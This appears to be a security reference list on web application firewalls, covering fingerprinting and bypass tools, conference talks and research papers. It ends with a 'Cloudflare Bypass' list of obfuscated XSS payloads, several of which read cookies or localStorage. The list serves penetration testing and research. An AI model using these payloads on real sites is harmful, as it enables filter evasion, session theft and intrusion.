Web Application Firewall
WAF Testing Resources
Awesome-WAF - The Definitive Guide.
Detection and Fingerprinting Tools
WhatWaf - Detect and bypass web application firewalls and protection systems
WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity.
WAF Testing Guides and Tools
XSS-Rat's WAF Checklist - Everything you need to do to bypass a Web Application Firewall.
Lightbulb Framework - A WAF testing suite written in Python.
WAF Testing Framework - A WAF testing tool by Imperva.
Framework for Testing WAFs (FTW) - A framework by the OWASP CRS team that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline.
abuse-ssl-bypass-waf - Bypassing WAF by abusing SSL/TLS Ciphers
WAF Evasion and Bypass Tools
WAFNinja - A smart tool which fuzzes and can suggest bypasses for a given WAF by @khalilbijjou.
libinjection-fuzzer - A fuzzer intended for finding libinjection bypasses, but it can probably be used universally.
bypass-firewalls-by-DNS-history - Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bug bounty hunters.
abuse-ssl-bypass-waf - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
SQLMap Tamper Scripts - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
Bypass WAF BurpSuite Plugin - A plugin for Burp Suite which adds some request headers so that the requests appear to come from the internal network.
Training and Research
Much of the content mentioned above has been taken from some of the following excellent writeups:
Methods to Bypass a Web Application Firewall - A presentation from PT Security about bypassing WAF filters and evasion.
Web Application Firewall Bypassing (How to Defeat the Blue Team) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by @OWASP.
WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP.
Protocol Level WAF Evasion Techniques - A presentation about efficiently evading WAFs at protocol level from BlackHat US 12.
Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16.
WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits.
Side Channel Attacks for Fingerprinting WAF Filter Rules - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from USENIX WOOT'12.
Our Favorite XSS Filters/IDS and how to Attack Them - A presentation about how to evade XSS filters set by WAF rules from BlackHat USA 09.
Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16.
A Forgotten HTTP Invisibility Cloak - A presentation about techniques that can be used to bypass common WAFs from BSides Manchester.
Building Your Own WAF as a Service and Forgetting about False Positives - A presentation about how to build a hybrid mode WAF that can work both in an out-of-band manner as well as inline to reduce false positives and latency, from Auscert2019.
Research Papers:
Protocol Level WAF Evasion - Protocol level WAF evasion techniques and analysis by Qualys.
Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks.
Bypassing Web Application Firewalls with HTTP Parameter Pollution - A research paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution.
Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis.
Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters.
WAF Evasion Testing - A WAF evasion testing guide from SANS.
Side Channel Attacks for Fingerprinting WAF Filter Rules - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from USENIX WOOT'12.
WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium.
WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of the 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam.
Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS.
Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs.
Bypassing WAF XSS Detection Mechanisms - A research paper about bypassing XSS detection mechanisms in WAFs.
Cloudflare Bypass
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<img ignored=() src=x onerror=prompt(1)>